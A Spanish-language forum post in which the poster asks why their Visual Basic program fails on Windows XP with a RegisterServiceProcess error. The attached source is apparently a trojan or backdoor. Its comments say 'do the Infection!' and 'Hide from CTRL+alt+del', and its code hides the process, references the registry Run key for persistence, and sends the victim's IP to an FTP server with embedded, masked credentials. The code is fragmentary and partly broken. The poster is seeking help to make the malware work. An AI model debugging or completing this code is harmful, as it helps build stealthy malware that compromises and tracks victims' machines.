Hola a todos, tengo la siguiente fuente de VB y me gustaria saber si tiene algun arror con arranque en XP, pk me sale el siguiente error "Can't find DLL entry point RegisterServiceProcess in kernel32"
(Fuente adjuta tambien)
la fuente es esta:
Private Sub Main()
cAppDirectory = App.path
If Right(cAppDirectory, 1) <> "\" Then
cAppDirectory = cAppDirectory + "\"
End If
If App.PrevInstance Then
End If
lWindowsNT = False
xAnswer = VersaoWindows()
If Not lWindowsNT Then
xAnswer = RegisterServiceProcess(0, 1)
End If
xAnswer = GetSystemDirectory(cBuffer, Len(cBuffer))
cDiretorioSystem = Left(cBuffer, xAnswer)
xAnswer = GetWindowsDirectory(cBuffer, Len(cBuffer))
cDiretorioWindows = Left(cBuffer, xAnswer)
If Right(cDiretorioSystem, 1) <> "\" Then
cDiretorioSystem = cDiretorioSystem + "\"
End If
If Right(cDiretorioWindows, 1) <> "\" Then
cDiretorioWindows = cDiretorioWindows + "\"
End If
'''''''initiate constants
tempString = Space(260)
GetSystemDirectory tempString, 260 '"c:\windows\system\"
WINSYSTEM = Left(tempString, InStr(tempString, Chr(0)) - 1) & "\"
APPPATH = App.path
If Not Right(APPPATH, 1) = "\" Then APPPATH = APPPATH & "\"
runPosition = "SOFTWARE\Microsoft\Windows\CurrentVersion\Run"
dialPosition = "System32\"
'ftpSendIP statements
lpData = APINULL
lpcbData = APINULL
hOpen = 0
ftpOpen = 0
IPsent = False
ftpServer = "ftp.XXX.XX"
'ftpServer = ""
ftpLogin = "XXXX"
ftpPass = "XXXX"
'get current video options!
EnumDisplaySettings 0, 0, screenMode
screenMode.dmFields = &H80000 Or &H100000
'''''''''do the Infection!
If Command$ = "/r" Then
ElseIf Command$ = "/s" Then
'fake notepad... hehe
'Shell "notepad.exe", vbNormalFocus
End If
If App.PrevInstance Then End
'Hide from CTRL+alt+del
RegisterServiceProcess GetCurrentProcessId(), RSP_SIMPLE_SERVICE
StartWinsock tempString
'load form without showing
Form1.Timer1.Enabled = True
'verify connection and send IP
Do While True
If isConnected Then
If Not IPsent Then sendIP
IPsent = True
IPsent = False
End If
End Sub
Si logran saber, o si saben que s porfavor diganmelo que llevo un mes intentando arreglar esto.